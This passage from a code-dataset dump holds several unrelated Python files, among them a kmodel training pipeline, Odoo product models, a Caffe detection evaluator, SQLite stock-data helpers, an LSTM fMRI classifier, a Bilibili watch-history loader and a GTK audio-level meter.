valid_times = 2,\n learning_rate=config.detector_train_learn_rate,\n )\n except Exception as e:\n log.e(\"train error: {}\".format(e))\n traceback.print_exc()\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"error occurred when train, error: {}\".format(str(e)) ))\n\n # 训练结束, 生成报告\n log.i(\"train ok, now generate report\")\n detector.report(self.result_report_img_path)\n\n # 生成 kmodel\n log.i(\"now generate kmodel\")\n detector.save(tflite_path=self.tflite_path)\n detector.get_sample_images(config.sample_image_num, self.dataset_sample_images_path)\n ok, msg = self.convert_to_kmodel(self.tflite_path, self.result_kmodel_path, config.ncc_kmodel_v3, self.dataset_sample_images_path)\n if not ok:\n log.e(\"convert to kmodel fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"convert kmodel fail: {}\".format(msg) ))\n\n # 拷贝模板文件\n log.i(\"copy template files\")\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"detector\", \"template\")\n self.__copy_template_files(template_dir, self.result_dir)\n\n # 写入 label 文件\n replace = 'labels = [\"{}\"]'.format('\", \"'.join(detector.labels))\n with open(self.result_labels_path, \"w\") as f:\n f.write(replace)\n with open(self.result_boot_py_path) as f:\n boot_py = f.read()\n with open(self.result_boot_py_path, \"w\") as f:\n target = 'labels = [] # labels'\n boot_py = boot_py.replace(target, replace)\n target = 'anchors = [] # anchors'\n replace = 'anchors = [{}]'.format(', '.join(str(i) for i in detector.anchors))\n boot_py = boot_py.replace(target, replace)\n target = 'sensor.set_windowing((224, 224))'\n replace = 'sensor.set_windowing(({}, {}))'.format(detector.input_shape[1], detector.input_shape[0])\n boot_py = boot_py.replace(target, replace)\n f.write(boot_py)\n\n return detector, config.detector_result_file_name_prefix\n\n def __copy_template_files(self, src_dir, dst_dir):\n files = os.listdir(src_dir)\n for f in files:\n shutil.copyfile(os.path.join(src_dir, f), os.path.join(dst_dir, f))\n\n def zip_dir(self, dir_path, out_zip_file_path):\n '''\n 将目录打包成zip, 注意传的目录是根目录,是不会被打包进压缩包的,如果需要文件夹,要在这个目录下建立一个子文件夹\n root_dir\n |\n -- data_dir\n -- data1\n -- data2\n zip: \n name.zip\n |\n -- data_dir\n -- data1\n -- data2\n '''\n shutil.make_archive(os.path.splitext(out_zip_file_path)[0], \"zip\", dir_path)\n \n\n def convert_to_kmodel(self, tf_lite_path, kmodel_path, ncc_path, images_path):\n '''\n @ncc_path ncc 可执行程序路径\n @return (ok, msg) 是否出错 (bool, str)\n '''\n p =subprocess.Popen([ncc_path, \"-i\", \"tflite\", \"-o\", \"k210model\", \"--dataset\", images_path, tf_lite_path, kmodel_path], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n output, err = p.communicate( )\n res = p.returncode\n except Exception as e:\n print(\"[ERROR] \", e)\n return False, str(e)\n res = p.returncode\n if res == 0:\n return True, \"ok\"\n else:\n print(\"[ERROR] \", res, output, err)\n return False, f\"output:\\n{output}\\nerror:\\n{err}\"\n\nif __name__ == \"__main__\":\n # train_task = Train(TrainType.CLASSIFIER, \"../datasets/test_classifier_datasets.zip\", \"\", \"../out\")\n train_task = Train(TrainType.DETECTOR, \"../datasets/test_detector_xml_format.zip\", \"\", \"../out\")\n train_task.train()\n\n","sub_path":"train/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534686676","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n hide_on_print = fields.Boolean('Do Not Print', default=False)\n hs_code = fields.Char(\n string=\"HS Code\",\n help=\"Standardized code for international shipping and goods declaration. At the moment, only used for the FedEx shipping provider.\",\n )\n\nclass ProductCategory(models.Model):\n _inherit = \"product.category\"\n\n hide_on_print = fields.Boolean('Do Not Print', default=False)\n profit_center = fields.Selection(\n [('Disassembly', 'Disassembly'), ('Machine Shop', 'Machine Shop'), ('Winding', 'Winding'), ('Assembly', 'Assembly'), ('Field Services', 'Field Services'), ('New Product Sales', 'New Product Sales'), ('Storage', 'Storage'), ('Training', 'Training')], string='Profit Center')\n\nclass ProductPricelistItem(models.Model):\n _inherit = 'product.pricelist.item'\n\n rebate_amount = fields.Float('Rebate Amount', digits=dp.get_precision('Product Price'))\n \nclass ProductProduct(models.Model):\n _inherit = 'product.product'\n\n @api.model\n def _anglo_saxon_sale_move_lines(self, name, product, uom, qty, price_unit, currency=False, amount_currency=False, fiscal_position=False, account_analytic=False, analytic_tags=False):\n res = super()._anglo_saxon_sale_move_lines(\n name,\n product,\n uom,\n qty,\n price_unit,\n currency=currency,\n amount_currency=amount_currency,\n fiscal_position=fiscal_position,\n account_analytic=account_analytic,\n analytic_tags=analytic_tags,\n )\n if res:\n res[0]['account_analytic_id'] = account_analytic and account_analytic.id\n res[0]['analytic_tag_ids'] = analytic_tags and analytic_tags.ids and [(6, 0, analytic_tags.ids)] or False\n return res\n\n","sub_path":"ssi_jobs/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"244309619","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport os\nimport sys\nimport numpy as np\nimport cv2\nimport math\nos.environ[\"GLOG_minloglevel\"] = \"2\"\nimport caffe\nimport copy\n\ndet_net =\"./deploy.prototxt\"\ndet_model = \"./vgg280half_raw/vgg_iter_22000.caffemodel\"\ngpu_id = 2\ntest_image_list=\"../data_new/test_image_all.txt\" #465张测试集\n#test_image_list=\"../data_new/test_image_path.txt\" #1239张测试集\nconf_thres = float(0.3)\ndetection_out_path = \"./detection_out/\"\n\nif gpu_id < 0:\n caffe.set_mode_cpu()\nelse:\n caffe.set_mode_gpu()\n caffe.set_device(gpu_id)\n# det caffe\ndet_caffe = caffe.Net(det_net, det_model, caffe.TEST)\n\ndet_caffe_channel, det_caffe_height, det_caffe_width = det_caffe.blobs['data'].data.shape[1:]\ndet_caffe.blobs[\"data\"].reshape(1, det_caffe_channel, det_caffe_height, det_caffe_width)\n\ndet_trans = caffe.io.Transformer({\"data\": det_caffe.blobs[\"data\"].data.shape})\ndet_trans.set_transpose(\"data\", (2, 0, 1))\ndet_trans.set_raw_scale('data', 255)\ndet_trans.set_mean(\"data\", np.array([104, 117, 123]))\ndet_trans.set_channel_swap('data', (2, 1, 0))\n\np=0\nwith open(test_image_list, \"r\") as il:\n for line in il:\n #image_path = \"../data_new/dataset/VOC_Car_Images_and_Labels/\"+line.strip(\"\\n\")\n image_path = \"../data_new/test_img_y/\"+line.strip(\"\\n\")\n cv_image = cv2.imread(image_path)\n if cv_image is None:\n print(\"Error: Image is None. %s\" % image_path)\n continue\n image_height, image_width = cv_image.shape[:2]\n\n # detect\n det_caffe.blobs[\"data\"].data[...] = det_trans.preprocess(\"data\", caffe.io.load_image(image_path))\n det_caffe_output = det_caffe.forward()\n det_results = det_caffe_output[\"detection_out\"][0][0].copy()\n num_results = 0\n fo = open(detection_out_path + line.replace(\".jpg\\n\",\".txt\"), \"w\")\n for i in range(det_results.shape[0]):\n conf = det_results[i][2]\n if conf < conf_thres:\n continue\n num_results += 1\n bbox_xmin = det_results[i][3] * image_width\n bbox_ymin = det_results[i][4] * image_height\n bbox_xmax = det_results[i][5] * image_width\n bbox_ymax = det_results[i][6] * image_height\n \n d=[str(int(math.ceil(conf))) +' ',str(int(bbox_xmin)) +' ',str(int(bbox_ymin)) +' ',str(int(bbox_xmax)) +' ',str(int(bbox_ymax)) +'\\n']\n fo.writelines(d)\n #print(\"Conf: %f BBox: %f %f %f %f\" % (conf, bbox_xmin, bbox_ymin, bbox_xmax, bbox_ymax))\n p=p+1\n print(\"loading......\" + str(p) + \" picture\")\n fo.close()\n #print(\"Image: %s %d\" % (image_path, num_results))\n\ndef IOU(x_labels, y_labels, w_labels, h_labels, x_detection, y_detection, w_detection, h_detection):\n x_iou = max(x_labels, x_detection)\n y_iou = max(y_labels, y_detection)\n w_iou = min(w_labels, w_detection)\n h_iou = min(h_labels, h_detection)\n S_labels = (w_labels - x_labels)*(h_labels - y_labels)\n S_detection = (w_detection - x_detection)*(h_detection - y_detection)\n w = w_iou - x_iou\n h = h_iou - y_iou\n if w < 0 or h < 0:\n return 0\n else:\n S_iou = w * h\n iou = S_iou / float((S_labels + S_detection - S_iou))\n return iou\n\n\n\nA = 0 # 检��到了对的物体\nB = 0 # 正确的物体没检测到\nC = 0 # 检测到了错误的物体\n#test_image_list = \"C:\\\\Users\\\\shzhoujun\\\\Desktop\\\\testmodels\\\\test_all_image_path.txt\"\nwith open(test_image_list, \"r\") as il:\n for line in il:\n test_labs_path = \"../data_new/testlabs/\" + line.replace(\".jpg\\n\",\".txt\")\n detection_out_p = \"./detection_out/\" + line.replace(\".jpg\\n\",\".txt\")\n with open(detection_out_p, \"r\") as dp:\n dp = dp.readlines()\n dp1 = copy.deepcopy(dp)#用来移除值的\n with open(test_labs_path, \"r\") as lp:\n lp = lp.readlines()\n lp1 = copy.deepcopy(lp) #用来移除值的\n\n for d in dp:\n # 若该图片一个都没检测到\n if len(dp) == 0:\n B = B + len(lp)\n break\n # 若有检测到物体\n else:\n d_new = d.split(' ') # 按空格切分列表\n for l in lp1:\n l_new = l.split(' ')\n iou = IOU(int(l_new[1]), int(l_new[2]), int(l_new[3]), int(l_new[4]), int(d_new[1]), int(d_new[2]),\n int(d_new[3]), int(d_new[4]))\n if iou >= 0.5:\n A = A + 1 #检测到了正确的物体\n lp1.remove(l)\n dp1.remove(d)\n break\n\n C = C + len(dp1) #检测到了错误的物体(不在GT中)\n B = B + len(lp1) #没有检测到的物体\n\n\nprint(\"precision = \", A / float((A + C)))\nprint(\"recall = \", A / float((A + B)))\nprint( A)\nprint( B)\nprint( C)\n\n\n","sub_path":"V1_vgg/V1_vgg280_half_raw/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206276443","text":"import sqlite3\nfrom datetime import datetime\n\n\ndef connect(db_filename):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n return conn, c\n\ndef close(conn):\n conn.close()\n\ndef createDb(db_filename):\n conn = sqlite3.connect(db_filename)\n conn.commit()\n conn.close()\n\ndef createTable(db_filename, table_name, col_names, col_types):\n if len(col_names) != len(col_types):\n raise ValueError('number of names and number of types does not match.')\n entries = '\\n'\n for name, col_type in zip(col_names, col_types):\n entries += str(name) + ' ' + str(col_type) + ',\\n'\n if len(entries) > 1:\n entries = entries[:-2] # remove the last ',\\n'\n sql_str = 'CREATE TABLE {0} ({1})'.format(table_name, entries)\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n c.execute(sql_str)\n conn.commit()\n conn.close()\n\ndef getTableColumns(db_filename, table_name):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n sql_str = \"SELECT * FROM {}\".format(table_name)\n c.execute(sql_str)\n names = [description[0] for description in c.description]\n conn.close()\n return names\n\ndef addOHLCVRow(db_filename, table_name,\n ticker='NAN', date=None,\n o=-1, h=-1, l=-1, c=-1, v=-1):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n if date is not None:\n sql_str = 'INSERT INTO {}(ticker, date, open, high, low, close, volume)' \\\n 'VALUES(?,?,?,?,?,?,?)'.format(table_name)\n c.execute(sql_str, (ticker, date, o, h, l, c, v))\n conn.commit()\n conn.close()\n else:\n conn.close()\n raise ValueError('date is None.')\n\ndef addOHLCVData(db_filename, table_name, new_values):\n conn = sqlite3.connect(db_filename)\n cursor = conn.cursor()\n cursor.execute('SELECT COUNT(*) FROM {}'.format(table_name))\n count = cursor.fetchall()\n sql_str = 'INSERT INTO {} VALUES(?,?,?,?,?,?,?)'.format(table_name)\n if count == 0:\n cursor.executemany(sql_str, new_values) # assuming already sorted by date\n else:\n sql_last_row_str = 'SELECT * FROM {} ORDER BY date(date) DESC LIMIT 1'.format(table_name)\n cursor.execute(sql_last_row_str)\n last_row = cursor.fetchone()\n last_date_str = last_row[1]\n last_date = datetime.strptime(last_date_str, '%m-%d-%y')\n for i, val in enumerate(new_values):\n this_date = datetime.strptime(val[1], '%m-%d-%y') \n this_date > last_date\n break\n new_values = new_values[i:]\n cursor.executemany(sql_str, new_values) # assuming already sorted by date\n conn.commit()\n conn.close()\n","sub_path":"data_getter/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243084967","text":"import sys\nimport time\nimport RPi.GPIO as GPIO\nimport time\nimport Adafruit_DHT\n\nLED = 27\nsensor = 22\npin = 17\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LED, GPIO.OUT)\nGPIO.output(LED, False)\n\nhumidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n\ndef askUserTemperature():\n value = int(\n input(\"Choose your temperature in degre Celsius [0...A lot]: \"))\n return value\n\n\ntemperatureToDoNotReach = askUserTemperature()\n\nwhile True:\n if humidity is not None and temperature is not None:\n if (temperature > temperatureToDoNotReach):\n GPIO.output(LED, True)\n else:\n GPIO.output(LED, False)\n else:\n print('Failed to get reading. Try again!')\n time.sleep(2)\n","sub_path":"7_ask_temperature_led.py","file_name":"7_ask_temperature_led.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619406525","text":"# 在Python中,比方说要把一个32位无符号整数变成字节,也就是4个长度的bytes,你得配合位运算符这么写\nn = 10240099\nb1 = (n & 0xff000000) >> 24\nb2 = (n & 0xff0000) >> 16\nb3 = (n & 0xff00) >> 8\nb4 = n & 0xff\nbs = bytes([b1, b2, b3, b4])\nprint(bs) # b'\\x00\\x9c@c'\n\n\n\"\"\"\n非常麻烦。如果换成浮点数就无能为力了。\n好在Python提供了一个struct模块来解决bytes和其他二进制数据类型的转换。\n\nstruct的pack函数把任意数据类型变成bytes:\n\"\"\"\nimport struct\n\nprint(struct.pack('>I', 10240099)) # b'\\x00\\x9c@c'\n\n\"\"\"\npack的第一个参数是处理指令,'>I'的意思是:>表示字节顺序是big-endian,也就是网络序,I表示4字节无符号整数。\n后面的参数个数要和处理指令一致。\n\nunpack把bytes变成相应的数据类型:\n根据>IH的说明,后面的bytes依次变为I:4字节无符号整数和H:2字节无符号整数\n\"\"\"\nprint(struct.unpack('>IH', b'\\xf0\\xf0\\xf0\\xf0\\x80\\x80')) # (4042322160, 32896)\n\n\n\n\n\n\n","sub_path":"pystudy/build_in_module/_struct.py","file_name":"_struct.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309320323","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport csv\nimport torch\nimport numpy as np\nimport random\nfrom torch import nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.over_sampling import RandomOverSampler\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nclass Rnn(nn.Module):\n def __init__(self, in_dim, hidden_dim, n_layer, n_class):\n super(Rnn, self).__init__()\n self.n_layer = n_layer\n self.hidden_dim = hidden_dim\n self.lstm = nn.LSTM(in_dim, hidden_dim, n_layer,\n batch_first=True)\n self.classifier = nn.Linear(hidden_dim, n_class)\n\n def forward(self, x):\n # h0 = Variable(torch.zeros(self.n_layer, x.size(1),\n # self.hidden_dim)).cuda()\n # c0 = Variable(torch.zeros(self.n_layer, x.size(1),\n # self.hidden_dim)).cuda()\n out, (h_n,h_c) = self.lstm(x, None)\n out = out[:, -1, :]\n out = self.classifier(out)\n return out\n\ndef dataReader(sub, task):\n Input = []\n label = []\n path_label = '/home/zmx/ds002311/event/'\n for t in task:\n path_input = '/home/zmx/ds002311/preprocessed_4D/' + t + '/'\n for i in sub:\n if i < 10:\n num = 'sub-0' + str(i)\n else:\n num = 'sub-' + str(i)\n\n input_name = num + '_' + t\n if t == 'mot_1':\n label_name = num + '_func_' + num + '_task-mot_run-01_events'\n elif t == 'mot_2':\n label_name = num + '_func_' + num + '_task-mot_run-02_events'\n elif t == 'mot_3':\n label_name = num + '_func_' + num + '_task-mot_run-03_events'\n else:\n label_name = num + '_func_' + num + '_task-' + t + '_events'\n\n data = csv.reader(open(path_input + input_name + '.csv'))\n with open(path_label + label_name + '.tsv','rt') as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n cond = [row['cond'] for row in reader]\n for i in range(len(cond)):\n if cond[i] == 'targ_easy':\n cond[i] = 0\n elif cond[i] == 'targ_hard':\n cond[i] = 1\n elif cond[i] == 'lure_hard':\n cond[i] = 2\n label.extend(cond)\n\n label = list(label)\n data = list(data)\n del data[0:13] # 从第13个时间点开始,删除表头以及前12个时间点\n del label[24] # 最后一段时间不全\n float_data = []\n for each in data:\n each_line=list(map(lambda x: float(x), each))\n float_data.append(each_line)\n\n for i in range(24): # 最后一段时间不全\n Input.append(float_data[16*i:16*i+16])\n Input = np.array(Input)\n label = np.array(label)\n return Input, label\n\n#sub = [1,3,5,6,7,8,9,10,13,14,15,18,21,22,23]\n#task = ['loc','mot_1','mot_2','mot_3','prememory','postmemory']\ntrain_x, train_y = dataReader([6],['mot_1','mot_2','mot_3'])\ntest_x, test_y = dataReader([6],['mot_1'])\ntest_x = torch.from_numpy(test_x)\ntest_x = torch.tensor(test_x, dtype=torch.float32)\ntest_y = torch.from_numpy(test_y)\n\nsmo = SMOTE(random_state=42) # SMOTE处理样本数量不对称\nnsamples, nx, ny = train_x.shape\nd2_train_dataset = train_x.reshape((nsamples,nx*ny))\ntrain_x_smo, train_y_smo = smo.fit_sample(d2_train_dataset, train_y)\ntrain_x_smo = train_x_smo.reshape(len(train_x_smo), nx, ny)\n\nepochs = 100\nsequence_length = 16\ninput_size = 28\n\nrnn = Rnn(28, 256, 2, 3) # 28个脑区,序列长度为16,LSTM网络层数2层,3分类\nrnn.to(device)\n\n# 定义loss和optimizer\noptimizer = optim.Adam(rnn.parameters(), lr=0.02)\ncriterion = nn.CrossEntropyLoss()\n\n# 训练\nfor epoch in range(epochs):\n state = np.random.get_state()\n np.random.shuffle(train_x_smo)\n np.random.set_state(state)\n np.random.shuffle(train_y_smo)\n data_x = torch.from_numpy(train_x_smo)\n data_x = torch.tensor(data_x, dtype=torch.float32)\n data_y = torch.from_numpy(train_y_smo)\n\n i = 1\n\n for b_x, b_y in zip(data_x,data_y):\n b_x = b_x.reshape(-1, sequence_length, input_size)\n b_y = b_y.reshape(-1)\n b_x, b_y = b_x.to(device), b_y.to(device)\n output = rnn(b_x)\n loss = criterion(output,b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(loss)\n\n\n# 测试\nwith torch.no_grad():\n correct = 0\n total = 0\n for t_x, t_y in zip(test_x, test_y):\n t_x = t_x.reshape(-1, sequence_length, input_size)\n t_y = t_y.reshape(-1)\n t_x, t_y = t_x.to(device), t_y.to(device)\n output = rnn(t_x)\n _, predicted = torch.max(output.data, 1)\n total += t_y.size(0)\n correct += (predicted == t_y).sum().item()\n print('Test Accuracy of the model: {} %'.format(100 * correct / total))","sub_path":"LSTM_difficulty.py","file_name":"LSTM_difficulty.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"573710172","text":"import django\ndjango.setup()\nfrom sefaria.model import *\nfrom bs4 import BeautifulSoup\nfrom sources.functions import get_index_api, post_index\nfile = open(\"alt_struct_sichot_avodat_levi.xml\")\nsoup = BeautifulSoup(file)\nnodes = []\nindex = get_index_api(\"Sichot Avodat Levi\", server=\"http://draft.sefaria.org\")\nelements = [el for el in soup.find(\"opml\").contents[3:] if el != \"\\n\"]\nfor el in elements:\n parsha_he, parsha_en = el.attrs[\"text\"].split(\" / \")\n parsha_node = SchemaNode()\n parsha_node.add_primary_titles(parsha_en, parsha_he)\n for child in [child for child in el.contents if child != \"\\n\"]:\n he, en = child.attrs[\"text\"].split(\" / \")\n ref = en.replace(\"Section \", \"\")\n child_node = ArrayMapNode()\n child_node.add_primary_titles(en, he)\n child_node.depth = 0\n child_node.refs = []\n child_node.wholeRef = \"Sichot Avodat Levi {}\".format(ref)\n parsha_node.append(child_node)\n parsha_node.validate()\n nodes.append(parsha_node.serialize())\nindex[\"alt_structs\"] = {\"Parasha\": {\"nodes\": nodes}}\npost_index(index, server=\"http://draft.sefaria.org\")\n\n","sub_path":"sources/Content_Quality/alt_struct_sichot_avodat_levi.py","file_name":"alt_struct_sichot_avodat_levi.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432120351","text":"#Autor: Karla Ximena Rueda Ruiz\n#Códigos correspondientes a los programas de la Misión 8\n\nentrada=[]\nsalida = []\ndef combinarLetras(entrada):\n salida = []\n for(i) in range (0,len(entrada)):\n if (i%2 == 0):\n salida.append(entrada[i].upper())\n else:\n salida.append(entrada[i].lower())\n return (salida)\nprint(combinarLetras(\"Hola\"))\n\n\nlista=[]\na = 0\ndef contieneLasVocales(lista):\n a = 0\n voc=[\"a\",\"e\",\"i\",\"o\",\"u\"]\n for (low)in range(0,len(voc)):\n if (voc[low]in lista):\n a = a + 1\n if a == 5:\n return True\n else:\n return False\n\nprint(contieneLasVocales(\"Ximena\"))\n\n\ndef formarNombreUsuario(nombre,apellido,matr):\n nom=nombre.lower()\n ape=apellido.lower()\n matricula=str(matr)\n usuario=nom[:3]+ape[:3]+matricula[-3:]\n return(usuario)\n\nprint(formarNombreUsuario(\"Karla\",\"Rueda\",1745943))\n\ndef esCorrecto(cadena):\n\n palabras=cadena.split()\n nombre=palabras[0]\n resto=nombre[1:]\n letra=nombre[0]\n if letra.isupper()==True:\n\n if resto.islower()==True:\n apellidop = palabras[1]\n restop = apellidop[1:]\n letraP = apellidop[0]\n\n\n if letraP.isupper()==True:\n\n if restop.islower()==True:\n apellidom = palabras[2]\n restom = apellidom[1:]\n letraM = apellidom[0]\n if letraM.isupper()==True:\n if restom.islower()==True:\n return True\n\n else:\n return False\n\n else:\n return False\n\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n\nprint(esCorrecto(\"Karla Rueda Ruiz\"))\n\ndef traducirTelefono(t):\n print(t)\n t = list(t)\n i = 6\n while i >= 6 and i <= 13:\n L = t[i]\n if L == \"A\" or L == \"B\" or L == \"C\":\n t[i] = \"2\"\n elif L == \"D\" or L == \"E\" or L == \"F\":\n t[i] = \"3\"\n elif L == \"G\" or L == \"H\" or L == \"I\":\n t[i] = \"4\"\n elif L == \"J\" or L == \"K\" or L == \"L\":\n t[i] = \"5\"\n elif L == \"M\" or L == \"N\" or L == \"O\":\n t[i] = \"6\"\n elif L == \"P\" or L == \"Q\" or L == \"R\" or L == \"S\":\n t[i] = \"7\"\n elif L == \"T\" or L == \"U\" or L == \"V\":\n t[i] = \"8\"\n elif L == \"W\" or L == \"X\" or L == \"Y\" or L == \"Z\":\n t[i] = \"9\"\n\n i += 1\n\n print(\"\".join(t))\n\n\nt = \"01800-VOY-BIEN\"\ntraducirTelefono(t)\n\n","sub_path":"Misión_08.py","file_name":"Misión_08.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17538041","text":"import time\nfrom collections import defaultdict\nfrom http.cookies import SimpleCookie\n\nimport pendulum\nimport requests\n\nfrom .base_loader import BaseLoader\nfrom .config import BILIBILI_HISTORY_URL\n\n\nclass BilibiliLoader(BaseLoader):\n def __init__(self, from_year, to_year, **kwargs):\n super().__init__()\n self.from_year = from_year\n self.to_year = to_year\n self.number_by_date_dict = defaultdict(int)\n self.session = requests.Session()\n self.bilibili_cookie = kwargs.get(\"bilibili_cookie\", \"\")\n self._make_years_list()\n\n def _parse_bilibili_cookie(self):\n cookie = SimpleCookie()\n cookie.load(self.bilibili_cookie)\n cookies_dict = {}\n cookiejar = None\n for key, morsel in cookie.items():\n cookies_dict[key] = morsel.value\n cookiejar = requests.utils.cookiejar_from_dict(\n cookies_dict, cookiejar=None, overwrite=True\n )\n return cookiejar\n\n def get_api_data(self, max_oid=\"\", view_at=\"\", data_list=[]):\n r = self.session.get(\n BILIBILI_HISTORY_URL.format(max_oid=max_oid, view_at=view_at)\n )\n if not r.ok:\n raise Exception(\n \"Can not get bilibili history data, please check your cookie\"\n )\n data = r.json()[\"data\"]\n if not data[\"list\"]:\n return data_list\n l = data[\"list\"]\n max_oid = l[-1][\"history\"][\"oid\"]\n view_at = l[-1][\"view_at\"]\n data_list.extend(l)\n # spider rule\n time.sleep(0.1)\n return self.get_api_data(max_oid=max_oid, view_at=view_at, data_list=data_list)\n\n def make_track_dict(self):\n data_list = self.get_api_data()\n for d in data_list:\n date_str = pendulum.from_timestamp(\n d[\"view_at\"], tz=self.time_zone\n ).to_date_string()\n self.number_by_date_dict[date_str] += 1\n for _, v in self.number_by_date_dict.items():\n self.number_list.append(v)\n\n def get_all_track_data(self):\n # first we need to activate the session with cookie str from `chrome`\n self.session.cookies = self._parse_bilibili_cookie()\n\n self.make_track_dict()\n self.make_special_number()\n return self.number_by_date_dict, self.year_list\n","sub_path":"loader/bilibili_loader.py","file_name":"bilibili_loader.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2009225","text":"import math\nimport cairo\n\nfrom lib.config import Config\nfrom gi.repository import Gtk, GLib, Gst\n\n\nclass AudioLevelDisplay(Gtk.DrawingArea):\n \"\"\"Displays a Level-Meter of another VideoDisplay into a GtkWidget\"\"\"\n __gtype_name__ = 'AudioLevelDisplay'\n\n def __init__(self):\n self.num_audiostreams_ = int(Config.get('mix', 'audiostreams'))\n meters = Config.get('mainvideo', 'vumeter')\n if (meters != 'all') and (int(meters) < self.num_audiostreams_):\n self.num_audiostreams_ = int(meters)\n\n self.channels = 2\n acaps = Gst.Caps.from_string(Config.get('mix', 'audiocaps'))\n self.channels = int(acaps.get_structure(0).get_int(\"channels\")[1])\n\n self.levelrms = [0] * self.channels * self.num_audiostreams_\n self.levelpeak = [0] * self.channels * self.num_audiostreams_\n self.leveldecay = [0] * self.channels * self.num_audiostreams_\n\n self.height = -1\n\n self.set_size_request(20 * self.num_audiostreams_, -1)\n\n # register on_draw handler\n self.connect('draw', self.draw_callback)\n\n # generate gradient from green to yellow to red in logarithmic scale\n def gradient(self, brightness, darkness, height):\n # prepare gradient\n lg = cairo.LinearGradient(0, 0, 0, height)\n # set gradient stops\n lg.add_color_stop_rgb(0.0, brightness, darkness, darkness)\n lg.add_color_stop_rgb(0.22, brightness, brightness, darkness)\n lg.add_color_stop_rgb(0.25, brightness, brightness, darkness)\n lg.add_color_stop_rgb(0.35, darkness, brightness, darkness)\n lg.add_color_stop_rgb(1.0, darkness, brightness, darkness)\n # return result\n return lg\n\n def draw_callback(self, widget, cr):\n # number of audio-channels\n channels = len(self.levelrms)\n\n if channels == 0:\n return False\n\n width = self.get_allocated_width()\n height = self.get_allocated_height()\n\n # space between the channels in px\n margin = 2\n\n # 1 channel -> 0 margins, 2 channels -> 1 margin, 3 channels…\n channel_width = int((width - (margin * (channels - 1))) / channels)\n\n # self.log.debug(\n # 'width: %upx filled with %u channels of each %upx '\n # 'and %ux margin of %upx',\n # width, channels, channel_width, channels - 1, margin\n # )\n\n # normalize db-value to 0…1 and multiply with the height\n rms_px = [self.normalize_db(db) * height for db in self.levelrms]\n peak_px = [self.normalize_db(db) * height for db in self.levelpeak]\n decay_px = [self.normalize_db(db) * height for db in self.leveldecay]\n\n if self.height != height:\n self.height = height\n # setup gradients for all level bars\n self.bg_lg = self.gradient(0.25, 0.0, height)\n self.rms_lg = self.gradient(1.0, 0.0, height)\n self.peak_lg = self.gradient(0.75, 0.0, height)\n self.decay_lg = self.gradient(1.0, 0.5, height)\n\n # draw all level bars for all channels\n for channel in range(0, channels):\n # start-coordinate for this channel\n x = (channel * channel_width) + (channel * margin)\n\n # draw background\n cr.rectangle(x, 0, channel_width, height - peak_px[channel])\n cr.set_source(self.bg_lg)\n cr.fill()\n\n # draw peak bar\n cr.rectangle(\n x, height - peak_px[channel], channel_width, peak_px[channel])\n cr.set_source(self.peak_lg)\n cr.fill()\n\n # draw rms bar below\n cr.rectangle(\n x, height - rms_px[channel], channel_width,\n rms_px[channel] - peak_px[channel])\n cr.set_source(self.rms_lg)\n cr.fill()\n\n # draw decay bar\n cr.rectangle(x, height - decay_px[channel], channel_width, 2)\n cr.set_source(self.decay_lg)\n cr.fill()\n\n # draw medium grey margin bar\n if margin > 0:\n cr.rectangle(x + channel_width, 0, margin, height)\n cr.set_source_rgb(0.5, 0.5, 0.5)\n cr.fill()\n\n # draw db text-markers\n for db in [-40, -20, -10, -5, -4, -3, -2, -1]:\n text = str(db)\n (xbearing, ybearing,\n textwidth, textheight,\n xadvance, yadvance) = cr.text_extents(text)\n\n y = self.normalize_db(db) * height\n if y > peak_px[channels - 1]:\n cr.set_source_rgb(1, 1, 1)\n else:\n cr.set_source_rgb(0, 0, 0)\n cr.move_to((width - textwidth) - 2, height - y - textheight)\n cr.show_text(text)\n\n return True\n\n def normalize_db(self, db):\n # -60db -> 1.00 (very quiet)\n # -30db 